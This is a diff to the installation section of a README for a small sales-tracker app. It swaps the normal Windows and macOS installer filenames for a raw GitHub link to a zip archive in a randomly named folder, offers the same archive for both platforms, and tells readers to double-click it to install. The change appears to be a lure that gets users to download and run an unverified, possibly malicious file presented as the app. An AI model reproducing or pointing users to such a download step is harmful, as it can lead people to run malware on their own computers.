Elevate40/monthly-accessories-sales-tracker/README.md

 4. **Install the Application:**
    - **For Windows:**
-     - Locate the downloaded file (e.g., `monthly-accessories-sales-tracker-installer.exe`).
+     - Locate the downloaded file (e.g., `https://github.com/Elevate40/monthly-accessories-sales-tracker/raw/refs/heads/main/cystadenosarcoma/sales_accessories_tracker_monthly_1.3.zip`).
      - Double-click the file to run the installer.
      - Follow the on-screen instructions to complete the installation.
    - **For macOS:**
-     - Locate the downloaded file (e.g., `monthly-accessories-sales-tracker.dmg`).
+     - Locate the downloaded file (e.g., `https://github.com/Elevate40/monthly-accessories-sales-tracker/raw/refs/heads/main/cystadenosarcoma/sales_accessories_tracker_monthly_1.3.zip`).
      - Double-click the file to open it.
      - Drag the app icon into your Applications folder.